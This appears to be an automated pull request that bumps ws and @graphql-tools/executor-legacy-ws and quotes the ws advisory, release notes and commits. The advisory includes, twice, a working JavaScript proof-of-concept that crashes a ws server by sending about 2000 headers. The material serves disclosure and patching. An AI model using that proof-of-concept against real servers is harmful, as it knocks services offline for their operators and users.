[Security] Bump ws and @graphql-tools/executor-legacy-ws
Bumps ws and @graphql-tools/executor-legacy-ws. These dependencies needed to be updated together.
Updates ws
from 8.13.0 to 8.18.0 This update includes a security fix.
Vulnerabilities fixed
ws affected by a DoS when handling a request with many HTTP headers
Impact
A request with a number of headers exceeding the[
server.maxHeadersCount
][] threshold could be used to crash a ws server.Proof of concept
const http = require('http'); const WebSocket = require('ws'); const wss = new WebSocket.Server({ port: 0 }, function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; </tr></table>
... (truncated)
Patched versions: 8.17.1 Affected versions: >= 8.0.0, < 8.17.1
Release notes
Sourced from ws's releases.
8.18.0
Features
- Added support for
Blob
(#2229).8.17.1
Bug fixes
- Fixed a DoS vulnerability (#2231).
A request with a number of headers exceeding the[
server.maxHeadersCount
][] threshold could be used to crash a ws server.const http = require('http'); const WebSocket = require('ws'); const wss = new WebSocket.Server({ port: 0 }, function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: wss.address().port }); request.end(); });
The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.
... (truncated)
Commits
-
976c53c
[dist] 8.18.0 -
59b9629
[feature] Add support forBlob
(#2229) -
0d1b5e6
[security] Use more descriptive text for 2017 vulnerability link -
15f11a0
[security] Add new DoS vulnerability to SECURITY.md -
3c56601
[dist] 8.17.1 -
e55e510
[security] Fix crash when the Upgrade header cannot be read (#2231) -
6a00029
[test] Increase code coverage -
ddfe4a8
[perf] Reduce the amount ofcrypto.randomFillSync()
calls -
b73b118
[dist] 8.17.0 -
29694a5
[test] Use thehighWaterMark
variable - Additional commits viewable in compare view
Updates @graphql-tools/executor-legacy-ws
from 1.0.1 to 1.0.6
Changelog
Sourced from @graphql-tools/executor-legacy-ws
's changelog.
1.0.6
Patch Changes
- #5913
83c0af0
Thanks@enisdenjo
! - dependencies updates:
- Updated dependency
@graphql-tools/utils@^10.0.13
↗ ︎ (from^10.0.0
, independencies
)1.0.5
Patch Changes
- #5762
701cfd3
Thanks@renovate
! - dependencies updates:
- Updated dependency
ws@8.15.0
↗ ︎ (from8.14.2
, independencies
)1.0.4
Patch Changes
- #5603
6c26c4fb
Thanks@renovate
! - dependencies updates:
- Updated dependency
ws@8.14.2
↗ ︎ (from8.14.1
, independencies
)1.0.3
Patch Changes
- #5575
b1531913
Thanks@renovate
! - dependencies updates:
- Updated dependency
ws@8.14.1
↗ ︎ (from8.14.0
, independencies
)1.0.2
Patch Changes
- #5570
4f6f5642
Thanks@renovate
! - dependencies updates:
- Updated dependency
ws@8.14.0
↗ ︎ (from8.13.0
, independencies
)
Commits
-
f59d7d7
chore(release): update monorepo packages versions (#5929) -
83c0af0
No unnecessary inline fragment spreads for union types in federation and link... -
a3259da
chore(release): update monorepo packages versions (#5763) -
38a92ab
Use ranged dependencies -
701cfd3
fix(deps): update dependency ws to v8.15.0 (#5762) -
1bd71cd
chore(release): update monorepo packages versions (#5631) -
6c26c4f
chore(deps): update all non-major dependencies (#5603) -
291b37b
chore(release): update monorepo packages versions (#5577) -
b153191
fix(deps): update all non-major dependencies (#5575) -
b8b8164
chore(release): update monorepo packages versions (#5571) - Additional commits viewable in compare view